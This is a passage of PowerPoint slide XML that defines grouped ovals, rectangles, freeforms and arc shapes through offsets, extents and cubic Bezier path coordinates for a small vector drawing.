                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{764C7435-F184-B14A-8278-77E8F1E491B9}"/>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0" name="Freeform 1074">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53814879-7D7F-474D-9EC9-E1F7CCEBE20C}"/>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11" name="Rectangle 1075">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFD1769-24C4-0D43-AFF2-F60E80560B21}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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12" name="Rectangle 1076">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E20F2C9B-0469-0640-A6A4-9D0FCC22EB3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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613" name="Group 1077">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B503B9-637F-0846-8479-EFC5BA46DC46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1971" y="370"/>
              <a:ext cx="94" cy="56"/>
              <a:chOff x="1223" y="2004"/>
              <a:chExt cx="94" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66614" name="Group 1078">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F6C2459-4829-304D-80CA-D037F6B1F180}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1223" y="2004"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1223" y="2004"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66615" name="Oval 1079">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0343A7-935B-5948-9136-3A90C369430C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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6" name="Oval 1080">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{275AD088-D4AE-E24C-8BE2-E1BE6D44669E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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7" name="Oval 1081">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13418076-D60C-AC4C-8654-96C923F08769}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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8" name="Oval 1082">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B62DB8CC-20FC-DE4F-A44D-83C9EBC888CE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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9" name="Oval 1083">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A168741A-5133-0940-A6A6-CD3FC9FAAFC6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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0" name="Oval 1084">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC19CBC-4463-7F4A-90A6-46BF37B66D2B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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1" name="Oval 1085">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4239EA-0FEB-F540-8F51-3BCEAF598CB8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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2" name="Oval 1086">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BB01F4-E42C-7443-9799-2744278B5B2F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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3" name="Oval 1087">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9A3BF24-DDF5-3844-9B2D-900E4D59C6EC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>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624" name="Group 1088">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD15FC1-9EA5-FC40-8476-E50804B6FE3B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1223" y="2004"/>
                <a:ext cx="94" cy="56"/>
                <a:chOff x="1223" y="2004"/>
                <a:chExt cx="94" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66625" name="Arc 1089">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C08B344-0CA1-5643-9D07-A6CFAA9B2D94}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1256" y="2004"/>
                  <a:ext cx="39" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20836 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 41085"/>
                    <a:gd name="T1" fmla="*/ 15905 h 21600"/>
                    <a:gd name="T2" fmla="*/ 41085 w 41085"/>
                    <a:gd name="T3" fmla="*/ 14080 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20836 w 41085"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="41085" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15905"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2567" y="6513"/>
                        <a:pt x="11099" y="0"/>
                        <a:pt x="20836" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29864" y="0"/>
                        <a:pt x="37941" y="5615"/>
                        <a:pt x="41084" y="14080"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="41085" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="15905"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2567" y="6513"/>
                        <a:pt x="11099" y="0"/>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6" name="Arc 1090">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1994C73E-64CD-D84F-ADB7-82B98039D779}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1257" y="2005"/>
                  <a:ext cx="37" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 20780 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 40935"/>
                    <a:gd name="T1" fmla="*/ 15706 h 21600"/>
                    <a:gd name="T2" fmla="*/ 40935 w 40935"/>
                    <a:gd name="T3" fmla="*/ 13833 h 21600"/>
                    <a:gd name="T4" fmla="*/ 20780 w 40935"/>
                    <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="40935" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15705"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2635" y="6413"/>
                        <a:pt x="11120" y="0"/>
                        <a:pt x="20780" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29712" y="0"/>
                        <a:pt x="37723" y="5498"/>
                        <a:pt x="40935" y="13832"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="40935" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="15705"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2635" y="6413"/>
                        <a:pt x="11120" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66627" name="Arc 1091">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038D33FA-56D1-3C43-BDAD-DB599C4451FD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1233" y="2010"/>
                  <a:ext cx="23" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 454 w 33372"/>
                    <a:gd name="T1" fmla="*/ 26005 h 26005"/>
                    <a:gd name="T2" fmla="*/ 33372 w 33372"/>
                    <a:gd name="T3" fmla="*/ 3490 h 26005"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33372"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26005"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33372" h="26005" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="453" y="26005"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="152" y="24556"/>
                        <a:pt x="0" y="23080"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25779" y="0"/>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8" name="Arc 1092">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBEE73E-B3AF-9541-9288-56BB40B22342}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1234" y="2011"/>
                  <a:ext cx="22" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 470 w 33223"/>
                    <a:gd name="T1" fmla="*/ 26082 h 26082"/>
                    <a:gd name="T2" fmla="*/ 33223 w 33223"/>
                    <a:gd name="T3" fmla="*/ 3394 h 26082"/>
                    <a:gd name="T4" fmla="*/ 21600 w 33223"/>
                    <a:gd name="T5" fmla="*/ 21600 h 26082"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="33223" h="26082" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="470" y="26081"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="157" y="24608"/>
                        <a:pt x="0" y="23106"/>
                        <a:pt x="0" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9670"/>
                        <a:pt x="9670" y="0"/>
                        <a:pt x="21600" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25718" y="0"/>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629" name="Arc 1093">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC766C4B-12DE-AA4E-93BD-36ED20A2EB40}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1229"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0" name="Arc 1094">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE1830A-9835-754F-B5D7-03E7A2E856B4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1230"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631" name="Arc 1095">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA0FC54-081D-BC48-B05A-408AEB3A8DCC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2010"/>
                  <a:ext cx="19" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4386 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25986"/>
                    <a:gd name="T1" fmla="*/ 450 h 33449"/>
                    <a:gd name="T2" fmla="*/ 22446 w 25986"/>
                    <a:gd name="T3" fmla="*/ 33449 h 33449"/>
                    <a:gd name="T4" fmla="*/ 4386 w 25986"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33449"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25986" h="33449" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="-1" y="449"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1442" y="150"/>
                        <a:pt x="2912" y="0"/>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0"/>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2" name="Arc 1096">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9FD6CA-E7B9-4C45-A51E-1CE92C00B904}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2011"/>
                  <a:ext cx="17" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4176 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25776"/>
                    <a:gd name="T1" fmla="*/ 407 h 33873"/>
                    <a:gd name="T2" fmla="*/ 21951 w 25776"/>
                    <a:gd name="T3" fmla="*/ 33873 h 33873"/>
                    <a:gd name="T4" fmla="*/ 4176 w 25776"/>
                    <a:gd name="T5" fmla="*/ 21600 h 33873"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25776" h="33873" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="407"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1375" y="136"/>
                        <a:pt x="2774" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66633" name="Arc 1097">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A291B319-561B-5145-8B79-ECB3FED81078}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1300" y="2024"/>
                  <a:ext cx="17" cy="14"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17217 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13043 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 30094"/>
                    <a:gd name="T2" fmla="*/ 17342 w 21600"/>
                    <a:gd name="T3" fmla="*/ 30094 h 30094"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17217 h 30094"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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4" name="Arc 1098">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61CAA82E-B44B-CC45-8DFE-25990AEF2899}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1300" y="2025"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17481 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12688 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 30713"/>
                    <a:gd name="T2" fmla="*/ 17073 w 21600"/>
                    <a:gd name="T3" fmla="*/ 30713 h 30713"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17481 h 30713"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66635" name="Arc 1099">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54B40E2B-6AC1-1042-BA0B-6B81298BB4EF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1294" y="2037"/>
                  <a:ext cx="20" cy="19"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 6631 0 0"/>
                    <a:gd name="G1" fmla="+- 6233 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 27312 w 28231"/>
                    <a:gd name="T1" fmla="*/ 0 h 27833"/>
                    <a:gd name="T2" fmla="*/ 0 w 28231"/>
                    <a:gd name="T3" fmla="*/ 26790 h 27833"/>
                    <a:gd name="T4" fmla="*/ 6631 w 28231"/>
                    <a:gd name="T5" fmla="*/ 6233 h 27833"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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6" name="Arc 1100">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5AE964-B542-6A41-AF0D-99D640B15A0B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1295" y="2037"/>
                  <a:ext cx="19" cy="18"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 6617 0 0"/>
                    <a:gd name="G1" fmla="+- 6246 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 27294 w 28217"/>
                    <a:gd name="T1" fmla="*/ 0 h 27846"/>
                    <a:gd name="T2" fmla="*/ 0 w 28217"/>
                    <a:gd name="T3" fmla="*/ 26807 h 27846"/>
                    <a:gd name="T4" fmla="*/ 6617 w 28217"/>
                    <a:gd name="T5" fmla="*/ 6246 h 27846"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66637" name="Arc 1101">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B2B2DF-67BF-1B4F-8043-8CAFC4724FEB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1223" y="2024"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21582 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13091 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41436 h 41436"/>
                    <a:gd name="T2" fmla="*/ 20717 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41436"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21582 h 41436"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41436" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="13091" y="41435"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5149" y="38031"/>
                        <a:pt x="0" y="30222"/>
                        <a:pt x="0" y="21582"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9996"/>
                        <a:pt x="9140" y="473"/>
                        <a:pt x="20717" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
